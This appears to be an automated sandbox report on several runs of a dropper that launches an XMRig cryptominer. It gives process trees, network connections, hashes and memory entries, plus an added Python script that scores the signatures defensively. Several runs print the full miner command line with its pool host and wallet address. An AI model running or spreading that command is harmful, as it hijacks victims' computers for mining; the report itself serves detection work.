Max time kernel
1794s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1124 wrote to memory of 640 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1124 wrote to memory of 640 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4236,i,1400471177590024469,587385956640537806,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4044,i,1400471177590024469,587385956640537806,262144 --variations-seed-version --mojo-platform-channel-handle=4240 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| BE | 88.221.83.232:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.83.221.88.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/640-14-0x0000024E81E40000-0x0000024E81E60000-memory.dmp
memory/640-15-0x0000024E81E90000-0x0000024E81EB0000-memory.dmp
memory/640-16-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-17-0x0000024E81ED0000-0x0000024E81EF0000-memory.dmp
memory/640-18-0x0000024E81EB0000-0x0000024E81ED0000-memory.dmp
memory/640-19-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-20-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-23-0x0000024E81EB0000-0x0000024E81ED0000-memory.dmp
memory/640-22-0x0000024E81ED0000-0x0000024E81EF0000-memory.dmp
memory/640-21-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-24-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-25-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-26-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-27-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-28-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-29-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-30-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-31-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-32-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-33-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-34-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-35-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-36-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-37-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-38-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-39-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-40-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-41-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-42-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-43-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-44-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-45-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-46-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-47-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-48-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-49-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-50-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-51-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-52-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-53-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-54-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-55-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-56-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-57-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-58-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-59-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-60-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-61-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-62-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-63-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-64-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-65-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-66-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-67-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-68-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-69-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-70-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-71-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-72-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-73-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-74-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-75-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-76-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-77-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-78-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-79-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-80-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-81-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-82-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 14:26
Platform
win10v2004-20240508-en
Max time kernel
1787s
Max time network
1799s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:16
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2604 wrote to memory of 2428 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2604 wrote to memory of 2428 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
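The rows above carry more than their labels. SeLockMemoryPrivilege is the right xmrig enables to back RandomX with large pages, and a binary under %TEMP% asking for it is a stronger signal than the generic "AdjustPrivilegeToken" heading suggests. The WriteProcessMemory rows tie the dropper to the child it started. The AuthRoot key, by contrast, is exactly what CryptoAPI's automatic root update populates after an outbound TLS chain ends in a root not yet cached locally, so on its own it is weak evidence of deliberate trust-store tampering. As an added example that is not part of this report, the Python below turns the behavioral4 signature rows into a scored verdict per process and attributes the miner back to its dropper. The events list is constructed from the tables above; the weights, the threshold and the user-writable path heuristic are this example's choices.

```python
"""Score a sandbox report's per-process signature rows and attribute the miner.

Added example, not part of the sandbox report. EVENTS is constructed from the
behavioral4 signature tables (Executes dropped EXE, Modifies system certificate
store, AdjustPrivilegeToken, FindShellTrayWindow, WriteProcessMemory). The
weights, the threshold and the user-writable path heuristic are assumptions.
"""
import re
from collections import defaultdict

# Paths a standard user can write to; a real service wanting large pages
# (database engines, hypervisors) is installed under Program Files instead.
USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\", re.I)
AUTHROOT = re.compile(
    r"\\SystemCertificates\\AuthRoot\\Certificates\\([0-9A-Fa-f]{40})")

# xmrig enables SeLockMemoryPrivilege to back RandomX with large pages, so that
# row from a %TEMP% binary is the strongest single signal here. The AuthRoot
# row gets little weight: CryptoAPI's automatic root update writes the same
# key when an outbound TLS chain ends in a root not yet cached locally.
WEIGHTS = {
    "dropped_exe_from_user_path": 3,
    "lock_memory_from_user_path": 4,
    "writes_into_child": 2,
    "authroot_write": 1,
}


def process_findings(events: list) -> dict:
    """Map each process to its findings; remember who wrote into whom."""
    findings = defaultdict(set)
    writers = {}          # target process -> process that wrote into it
    thumbprints = set()   # SHA-1 thumbprints added to the AuthRoot store
    for ev in events:
        proc, sig = ev["process"], ev["signature"]
        if sig == "Executes dropped EXE" and USER_WRITABLE.match(proc):
            findings[proc].add("dropped_exe_from_user_path")
        elif sig == "Suspicious use of AdjustPrivilegeToken":
            if "SeLockMemoryPrivilege" in ev.get("description", "") and USER_WRITABLE.match(proc):
                findings[proc].add("lock_memory_from_user_path")
        elif sig == "Suspicious use of WriteProcessMemory":
            findings[proc].add("writes_into_child")
            writers[ev["target"]] = proc
        elif sig == "Modifies system certificate store":
            m = AUTHROOT.search(ev.get("indicator", ""))
            if m:
                findings[proc].add("authroot_write")
                thumbprints.add(m.group(1).upper())
        # FindShellTrayWindow and other rows carry no weight in this scheme.
    return {"findings": dict(findings), "writers": writers,
            "thumbprints": sorted(thumbprints)}


def verdict(events: list, threshold: int = 6) -> dict:
    """Score processes, name the miner, walk WriteProcessMemory back to its parent."""
    res = process_findings(events)
    scores = {p: sum(WEIGHTS[f] for f in fs) for p, fs in res["findings"].items()}
    top = max(scores, key=scores.get) if scores else None
    miner = top if top is not None and scores[top] >= threshold else None
    return {
        "scores": scores,
        "miner": miner,
        "dropper": res["writers"].get(miner),
        "authroot_thumbprints": res["thumbprints"],
    }


# Constructed from the behavioral4 tables above; the Blob value is elided as "...".
XMRIG = r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe"
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
AUTHROOT_KEY = (r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot"
                r"\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349")
EVENTS = [
    {"signature": "Executes dropped EXE", "process": XMRIG},
    {"signature": "Modifies system certificate store", "description": "Key created",
     "indicator": AUTHROOT_KEY, "process": DROPPER},
    {"signature": "Modifies system certificate store", "description": "Set value (data)",
     "indicator": AUTHROOT_KEY + r"\Blob = ...", "process": DROPPER},
    {"signature": "Suspicious use of AdjustPrivilegeToken",
     "description": "Token: SeLockMemoryPrivilege", "process": XMRIG},
    {"signature": "Suspicious use of FindShellTrayWindow", "process": XMRIG},
    {"signature": "Suspicious use of WriteProcessMemory",
     "description": "PID 2604 wrote to memory of 2428", "process": DROPPER, "target": XMRIG},
]

if __name__ == "__main__":
    for k, v in verdict(EVENTS).items():
        print(f"{k:20} {v}")
```

On the behavioral4 rows this names xmrig.exe as the miner and main - Copy (3) - Copy.exe as its dropper, and reports the single AuthRoot thumbprint for a follow-up check against the Windows root program list before anyone treats it as an attacker-planted root.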
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2428-14-0x0000025327B40000-0x0000025327B60000-memory.dmp
memory/2428-15-0x0000025329480000-0x00000253294A0000-memory.dmp
memory/2428-16-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-18-0x00000253294A0000-0x00000253294C0000-memory.dmp
memory/2428-17-0x00000253294C0000-0x00000253294E0000-memory.dmp
memory/2428-19-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-20-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-23-0x00000253294A0000-0x00000253294C0000-memory.dmp
memory/2428-22-0x00000253294C0000-0x00000253294E0000-memory.dmp
memory/2428-21-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-24-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-25-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-26-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-27-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-28-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-29-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-30-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-31-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-32-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-33-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-34-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-35-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-36-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-37-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-38-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-39-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-40-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-41-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-42-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-43-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-44-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-45-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-46-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-47-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-48-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-49-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-50-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-51-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-52-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-53-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-54-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-55-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-56-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-57-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-58-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-59-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-60-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-61-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-62-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-63-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-64-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-65-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-66-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-67-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-68-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-69-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-70-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-71-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-72-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-73-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-74-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-75-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-76-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-77-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-78-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-79-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-80-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-81-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-82-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1798s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1104 wrote to memory of 4888 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1104 wrote to memory of 4888 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| BE | 88.221.83.201:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 201.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4888-14-0x00000158CFA60000-0x00000158CFA80000-memory.dmp
memory/4888-15-0x00000158CFBC0000-0x00000158CFBE0000-memory.dmp
memory/4888-16-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-18-0x00000158CFBE0000-0x00000158CFC00000-memory.dmp
memory/4888-17-0x00000158CFC00000-0x00000158CFC20000-memory.dmp
memory/4888-19-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-20-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-21-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
